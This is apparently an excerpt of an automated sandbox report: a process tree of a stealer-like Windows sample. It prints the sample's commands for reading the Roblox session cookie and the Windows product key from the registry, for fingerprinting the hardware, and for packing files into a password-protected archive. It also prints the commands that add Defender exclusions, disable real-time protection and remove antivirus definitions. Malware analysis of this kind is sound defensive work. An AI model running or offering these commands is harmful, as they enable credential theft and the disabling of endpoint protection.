    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2888
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19642\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\zuNfR.zip" *"
    3⤵
    PID:3348
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19642\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\zuNfR.zip" *
      4⤵
      Executes dropped EXE
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffedba0cc40,0x7ffedba0cc4c,0x7ffedba0cc58
  2⤵
  PID:372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1824 /prefetch:2
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1748 /prefetch:3
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2636 /prefetch:8
  2⤵
  PID:1932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4556 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4600 /prefetch:8
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3744,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3184 /prefetch:8
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4896,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4816 /prefetch:1
  2⤵
  PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5460,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:1228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5604,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3496 /prefetch:1
  2⤵
  PID:4688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6104,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5808,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4068 /prefetch:1
  2⤵
  PID:4032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6080,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6084 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3396,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=860 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3300,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3524,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3428 /prefetch:8
  2⤵
  PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5964,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3512 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5312,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6140 /prefetch:8
  2⤵
  PID:2696
- C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe
  "C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe"
  2⤵
  - Executes dropped EXE
  PID:4168
- - C:\Users\Admin\AppData\Local\Temp\nsm9F93.tmp\FiddlerSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\nsm9F93.tmp\FiddlerSetup.exe" /D=
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2812
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="FiddlerProxy"
      4⤵
      Modifies Windows Firewall
      PID:1628
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="FiddlerProxy" program="C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe" action=allow profile=any dir=in edge=deferuser protocol=tcp description="Permit inbound connections to Fiddler"
      4⤵
      Modifies Windows Firewall
      PID:4760
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
      4⤵
      PID:3284
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 188 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:5488
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 0 -NGENProcess 270 -Pipe 1f8 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:5224
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b0 -InterruptEvent 0 -NGENProcess 29c -Pipe 2a4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5248
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 2f8 -Pipe 2fc -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5892
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 2f0 -Pipe 28c -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        
        PID:5796
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f0 -InterruptEvent 0 -NGENProcess 2a0 -Pipe 2a8 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5436
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 0 -NGENProcess 2e8 -Pipe 2e4 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:6000
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2e0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:396
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 0 -NGENProcess 30c -Pipe 270 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:2696
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 0 -NGENProcess 298 -Pipe 30c -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5316
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\EnableLoopback.exe"
      4⤵
      PID:1712
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
        5⤵
        
        PID:1708
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 2b8 -Pipe 2c0 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1508
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2d0 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2988
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 0 -NGENProcess 2bc -Pipe 2b8 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2748
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 2e0 -Pipe 2dc -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1080
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 2e0 -Pipe 288 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4068
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 27c -Pipe 280 -Comment "NGen Worker Process"
        5⤵
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4996
  - - C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper
      "C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper" /a "C:\Users\Admin\AppData\Local\Programs\Fiddler"
      4⤵
      Executes dropped EXE
      PID:3600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Fiddler2FirstRun
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffedac946f8,0x7ffedac94708,0x7ffedac94718
        5⤵
        
        PID:1260
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        5⤵
        
        PID:2124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
        5⤵
        
        PID:4772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
        5⤵
        
        PID:4568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
        5⤵
        
        PID:5156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14449171257417800340,9004708060565328616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
        5⤵
        
        PID:5816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3416,i,15598466635313958519,10569445492321178843,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:6060

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:3236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5464

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5796

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:6120

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\Adorins.exe
"C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
1⤵
PID:5780
- C:\Users\Admin\AppData\Local\Temp\Adorins.exe
  "C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'"
    3⤵
    PID:5144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Loads dropped DLL
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:1904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      PID:6120
- - C:\Windows\system32\cmd.exe
